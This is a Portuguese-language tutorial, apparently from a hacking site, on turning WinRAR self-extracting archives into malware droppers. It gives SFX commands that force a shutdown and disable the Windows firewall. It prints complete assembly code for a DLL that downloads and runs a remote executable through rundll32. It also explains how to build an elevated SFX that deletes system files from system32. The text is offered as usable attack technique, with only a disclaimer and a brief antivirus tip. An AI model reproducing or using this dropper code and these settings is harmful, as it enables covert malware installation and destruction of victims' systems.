Pacotes SFX Saiba como usar o SFX do WinRAR para manipuar arquivos, vrus, backdoors e outros malwares.

Conhea tcnicas que podem ser usadas para burlar facilmente a segurana de um sistema. Basicamente um SFX um pequeno aplicativo que contm arquivos compactados. Pode ser compactados como ZIP ou RAR, a nica diferena que quando voc executar o SFX, ele automaticamente ir extrair os arquivos. No entanto, se voc adicionar alguns parmetros, voc pode execut-los aps a extrao ou executar um comando shell antes da extrao. As caractersticas que nos interessa no SFX so estas: No primeiro campo de entrada voc pode adicionar um nome de arquivo que j existe na unidade atual ou um dos arquivos extrados para executar aps a extrao. No segundo campo de entrada voc pode adicionar um nome de arquivo que j existe na unidade atual para executar antes da extrao.

Execuo bsica do Windows Shell Command dentro SFX No primeiro campo, digite este comando: %SYSTEMDRIVE%\windows\system32\cmd.exe /k shutdown -s -f -t 3600 Agora se gerar este pacote SFX e em seguida execut-lo, ir desligar o computador daqui 1 hora. Brincadeiras old school a parte, observe que voc pode fazer com que qualquer outro aplicativo presente no sistema se execute: %SYSTEMDRIVE%\windows\notepad.exe c:\shtext.txt Este acima abre um documento de texto no notepad, e j o cria na unidade C com o nome de shtext.txt, bacana no ?. netsh firewall set opmode disable Este outro acima desativa o firewall do sistema. %SYSTEMDRIVE%\Program Files\Internet Explorer\iexplore.exe http://securityhacker.org/ Este outro abre um site usando o Internet Explorer (neste caso voc pode usar outro navegador lembrando que deve estar instalado no sistema). E com esta sintaxe voc pode rodar diversos comandos ou programas.

Algo mais sorrateiro Esta uma prova de que usando apenas uma dll pequena no pacote SFX, podemos baixar e executar um aplicativo (que pode ser um vrus ou no). Para executar esta operao iremos usar: - O famoso Rundll32 aplicativo da Microsoft, um pequeno aplicativo usado para executar funes DLL de um programa externo. Ele ser chamado pelo SFX. - FASM Compiler (Assembler Flat), eu escolhi este compilador, pois muito fcil de usar e rpido (baixe no site http://flatassembler.net/) ele ser usado para criar a nossa dll downloader. Agora com o FASM j instalado em seu computador, crie uma pasta vazia e crie um arquivo qualquer com o nome de "suadll .asm". Quando terminar isto, abra o FASM e nele abra este arquivo que acabou de criar, no FASM, neste arquivo, cole o seguinte cdigo: ;------------------------------; SFX Downloader via RunDLL32 ; Feito por Spo0k3r ; securityhacker.org ;------------------------------format PE GUI 4.0 DLL entry DllEntryPoint include 'win32a.inc'

;-- rw section '.data' data readable writeable CMD_OPEN db 'open',0 url db 'http://siteparadownload.org/executavel.exe',0 output db 'c:\\executavel.exe',0 errmsg db 'ERROR',0 errtitle db '',0 okmsg db 'OK',0 oktitle db '',0 section '.text' code readable executable proc DllEntryPoint hinstDLL, fdwReason, lpvReserved mov eax,TRUE ret endp ;-- Esta funcao ira chamar o rundll32 via SFX pela linha proc dcscdownload xor eax, eax invoke URLDownloadToFile, 0, url, output, 0, NULL ; download cmp eax, 0 jne enderr invoke ShellExecute, 0, CMD_OPEN, output, 0, 0, SW_SHOW ; execute jmp endok enderr: invoke MessageBox, 0, errmsg, errtitle,0 jmp endpr endok: invoke MessageBox, 0, okmsg, oktitle,0 endpr: ret endp ;-- Tabela importar exportar section '.idata' import data readable writeable library kernel,'KERNEL32.DLL',\ urlmon,'URLMON.DLL',\ Shell32,'SHELL32.DLL',\ user,'USER32.DLL' import Shell32,\ ShellExecute,'ShellExecuteA' import user,\ MessageBox,'MessageBoxA' import urlmon,\ URLDownloadToFile,'URLDownloadToFileA' section '.edata' export data readable export 'OURDLL.DLL',\ dcscdownload,'dcscdownload' section '.reloc' fixups data discardable NO se esquea de editar a URL e o caminho de sada. Agora, na barra de menu clique em "Run" "Compile". E salve na pasta que criou o dll. Aps isso sua dll est pronta, agora podemos criar o SFX downloader, vamos seguir os seguintes passos: Clique com o boto direito sobre a dll e v para a opo "Adicionar para o arquivo..." no WinRAR. Escolha a opo de pacote SFX na lista de opes V para aba de Configuraes Avanadas

 Clique no boto Configuraes SFX No campo de entrada, adicione: %APPDATA%\dcsc\ourdll.dll - No primeiro parmetro de entrada coloque esta linha %SYSTEMDRIVE%\windows\system32\rundll32.exe %APPDATA%\dcsc\ourdll.dll, dcscdownload Agora voc pode gerar o seu arquivo, se voc tiver corretamente configurar o SFX, ento se voc execut-lo ele ir baixar e executar o arquivo escolhido aps as extraes. Confira a imagem de configurao do SFX: SFX Destruio de arquivo Como ultimo exemplo irei mostrar para vocs como destruir uma mquina inteira usando apenas opes do SFX. O gerador de SFX inclui duas outras funes perigosas (Executar como administrador e Excluir arquivos aps a extrao). A opo Executar como administrador vai pedir para execut-lo como administrador, de modo que o SFX ter todos os direitos sobre o sistema e aps a extrao, a excluso de arquivos ser legal usar para arquivos maliciosos. Para usar estas opes, siga os passos: Crie um pacote SFX novo e v para as opes do SFX (agora voc j sabe como) Nas opes SFX v para a guia Avanado e marque a caixa "Pedido de acesso administrativo" Ento, na primeira entrada "Excluir arquivos", digite a lista de arquivos que deseja excluir separados por um espao em branco (exemplo: rundll32.exe cmd.exe hello.exe .....) Agora volte para a guia geral e colocar como caminho de extrao: %SYSTEMDRIVE%\windows\system32\ E agora j pode gerar o SFX. ATENO: apenas um exemplo, no execute no seu computador este SFX pois poder causar danos no sistema se voc colocar arquivos a serem excludos importantes. Se quiser testar, use uma mquina virtual com o Time Machine instalado para poder reverter os problemas causados. Resumo rpido do que isso faz: Basicamente, este exemplo ir excluir rundll32.exe, cmd.exe e hello.exe do system32 durante a extrao. Observe: os arquivos a serem apagados sero apenas feitos no caminho da extrao, por isso que eu escolhi system32 no caminho de extrao e temos que ter o direito de extrair, por isso forar o SFX para ser executado como administrador.

Finalizao Bom, isto foi tudo. Espero que tenha apreciado este artigo sobre uma segurana questionvel de um SFX do WinRAR. A partir de agora voc percebe o quo perigoso pode ser baixar arquivos da internet pensando ser simples instaladores, o seu antivirus pode no detectar o contedo malicioso do SFX por ser criptografado pelo programa, bom sempre manter um antivrus com deteco de comportamento e para isso recomendo o Comodo Internet Security, free! Tambm quero ressaltar que no sou responsvel pelos danos, ou fins que voc for utilizar estas dicas. Por Elger Vincius.